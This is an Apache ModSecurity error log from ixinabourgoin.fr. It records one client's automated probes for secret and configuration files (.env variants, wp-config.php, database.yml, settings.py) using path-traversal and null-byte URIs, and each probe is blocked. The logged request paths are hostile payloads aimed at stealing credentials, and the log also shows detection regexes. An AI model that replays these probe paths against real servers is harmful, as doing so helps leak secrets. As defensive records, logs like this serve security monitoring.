[Tue May 12 05:10:32.336391 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/var/www/html/.env"] [unique_id "agKaKNr1yOh9TvizeziY2AAAAEQ"]
[Tue May 12 05:10:32.336527 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/var/www/html/.env"] [unique_id "agKaKNr1yOh9TvizeziY2AAAAEQ"]
[Tue May 12 05:10:32.336709 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/var/www/html/.env"] [unique_id "agKaKNr1yOh9TvizeziY2AAAAEQ"]
[Tue May 12 05:10:32.336715 2026] [core:error] [pid 1808852:tid 1808858] [client 45.148.10.246:21484] AH10244: invalid URI path (/../.env)
[Tue May 12 05:10:32.342259 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nNAAAAQE"]
[Tue May 12 05:10:32.342336 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nNAAAAQE"]
[Tue May 12 05:10:32.342446 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nNAAAAQE"]
[Tue May 12 05:10:32.342642 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nNAAAAQE"]
[Tue May 12 05:10:32.353581 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/public/.env"] [unique_id "agKaKNr1yOh9TvizeziY2QAAAEQ"]
[Tue May 12 05:10:32.353717 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/public/.env"] [unique_id "agKaKNr1yOh9TvizeziY2QAAAEQ"]
[Tue May 12 05:10:32.353928 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/public/.env"] [unique_id "agKaKNr1yOh9TvizeziY2QAAAEQ"]
[Tue May 12 05:10:32.356110 2026] [core:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 05:10:32.360250 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nNQAAAQE"]
[Tue May 12 05:10:32.360309 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nNQAAAQE"]
[Tue May 12 05:10:32.360409 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nNQAAAQE"]
[Tue May 12 05:10:32.360589 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nNQAAAQE"]
[Tue May 12 05:10:32.370683 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaKNr1yOh9TvizeziY2gAAAEQ"]
[Tue May 12 05:10:32.370819 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaKNr1yOh9TvizeziY2gAAAEQ"]
[Tue May 12 05:10:32.371022 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaKNr1yOh9TvizeziY2gAAAEQ"]
[Tue May 12 05:10:32.378107 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nNgAAAQE"]
[Tue May 12 05:10:32.378166 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nNgAAAQE"]
[Tue May 12 05:10:32.378268 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nNgAAAQE"]
[Tue May 12 05:10:32.378458 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nNgAAAQE"]
[Tue May 12 05:10:32.388072 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/www/.env"] [unique_id "agKaKNr1yOh9TvizeziY2wAAAEQ"]
[Tue May 12 05:10:32.388211 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/www/.env"] [unique_id "agKaKNr1yOh9TvizeziY2wAAAEQ"]
[Tue May 12 05:10:32.388396 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/www/.env"] [unique_id "agKaKNr1yOh9TvizeziY2wAAAEQ"]
[Tue May 12 05:10:32.396118 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nNwAAAQE"]
[Tue May 12 05:10:32.396246 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nNwAAAQE"]
[Tue May 12 05:10:32.396433 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKHo6NvB9WXx5V-6nNwAAAQE"]
[Tue May 12 05:10:32.414150 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nOAAAAQE"]
[Tue May 12 05:10:32.414278 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nOAAAAQE"]
[Tue May 12 05:10:32.414458 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKHo6NvB9WXx5V-6nOAAAAQE"]
[Tue May 12 05:10:32.431873 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nOQAAAQE"]
[Tue May 12 05:10:32.432027 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nOQAAAQE"]
[Tue May 12 05:10:32.432220 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKHo6NvB9WXx5V-6nOQAAAQE"]
[Tue May 12 05:10:32.439712 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/_profiler/open"] [unique_id "agKaKNr1yOh9TvizeziY3gAAAEQ"]
[Tue May 12 05:10:32.440106 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/_profiler/open"] [unique_id "agKaKNr1yOh9TvizeziY3gAAAEQ"]
